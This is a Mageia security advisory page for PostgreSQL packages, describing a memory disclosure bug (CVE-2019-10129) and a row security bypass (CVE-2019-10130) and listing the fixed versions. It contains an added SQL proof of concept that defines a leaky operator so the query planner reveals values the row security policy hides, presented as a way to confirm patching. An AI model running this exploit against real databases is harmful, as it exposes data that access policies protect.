MGASA-2019-0189

Source
https://advisories.mageia.org/MGASA-2019-0189.html
Import Source
https://advisories.mageia.org/MGASA-2019-0189.json
JSON Data
https://api.osv.dev/v1/vulns/MGASA-2019-0189
Related
Published
2019-06-10T19:17:03Z
Modified
2019-06-10T18:39:25Z
Summary
Updated postgresql packages fix security vulnerabilities
Details

Updated postgresql packages fix security vulnerabilities

CVE-2019-10129: Memory disclosure in partition routing

Prior to this release, a user running PostgreSQL 11 can read arbitrary bytes of server memory by executing a purpose-crafted INSERT statement to a partitioned table.

CVE-2019-10130: Selectivity estimators bypass row security policies

PostgreSQL maintains statistics for tables by sampling data available in columns; this data is consulted during the query planning process. Prior to this release, a user able to execute SQL queries with permissions to read a given column could craft a leaky operator that could read whatever data had been sampled from that column. If this happened to include values from rows that the user is forbidden to see by a row security policy, the user could effectively bypass the policy. This is fixed by only allowing a non-leakproof operator to use this data if there are no relevant row security policies for the table.
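The following is an added, constructed demonstration of the mechanism described for CVE-2019-10130; it is not code from the advisory or from the PostgreSQL project. The table, role, function and operator names (accounts, attacker, leak_eq, ===) are assumptions. It needs a server with row security (CREATE POLICY), and the attacker role only needs SELECT on the table plus the default ability to create functions and operators in a schema. The planner's eqsel estimator calls the operator's underlying function against each sampled most-common value of the column, so a function with a side effect on its input sees data the policy hides.

```sql
-- Constructed demonstration of CVE-2019-10130 (added example, not from the
-- advisory or PostgreSQL). All object names below are assumptions.
-- Section 1 runs as the table owner (e.g. a superuser), section 2 as the
-- low-privileged role.

-- 1. Owner creates a table, collects statistics, and hides odd rows from
--    the attacker with a row security policy.
CREATE ROLE attacker;
CREATE TABLE accounts (id int, secret text);
INSERT INTO accounts
    SELECT g, 'secret-' || (g % 20) FROM generate_series(1, 1000) AS g;
ANALYZE accounts;   -- pg_statistic now holds the most-common secret values
ALTER TABLE accounts ENABLE ROW LEVEL SECURITY;
CREATE POLICY even_only ON accounts FOR SELECT TO attacker USING (id % 2 = 0);
GRANT SELECT ON accounts TO attacker;

-- 2. Attacker defines a leaky comparison: the function reports its left
--    argument as a side effect. It is NOT leakproof (only superusers may
--    mark a function LEAKPROOF), yet the operator can still name eqsel as
--    its restriction estimator.
SET ROLE attacker;
CREATE FUNCTION leak_eq(text, text) RETURNS boolean AS $$
BEGIN
    RAISE NOTICE 'planner compared against sampled value: %', $1;
    RETURN false;
END $$ LANGUAGE plpgsql;
CREATE OPERATOR === (LEFTARG = text, RIGHTARG = text,
                     PROCEDURE = leak_eq, RESTRICT = eqsel);

-- Planning alone triggers the estimator; no row needs to be returned.
EXPLAIN SELECT * FROM accounts WHERE secret === 'anything';
-- Unfixed server: one NOTICE per sampled value, including secret-1,
--   secret-3, ... which belong only to rows the policy forbids.
-- Fixed server (postgresql9.6 >= 9.6.13 here): no NOTICEs, because the
--   estimator only hands statistics to a non-leakproof operator when no
--   row security policy applies to the table.

RESET ROLE;

-- Cleanup (as owner).
DROP OPERATOR === (text, text);
DROP FUNCTION leak_eq(text, text);
DROP TABLE accounts;
DROP ROLE attacker;
```

To confirm a patched server, run the block on a scratch database after updating and check that the EXPLAIN produces no NOTICE lines; SHOW server_version should report at least the fixed version listed below for the package in use.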

References
Credits

Affected packages

Mageia:6 / postgresql9.4

Package

Name
postgresql9.4
Purl
pkg:rpm/mageia/postgresql9.4?distro=mageia-6

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
9.4.22-1.mga6

Ecosystem specific

{
    "section": "core"
}

Mageia:6 / postgresql9.6

Package

Name
postgresql9.6
Purl
pkg:rpm/mageia/postgresql9.6?distro=mageia-6

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
9.6.13-3.mga6

Ecosystem specific

{
    "section": "core"
}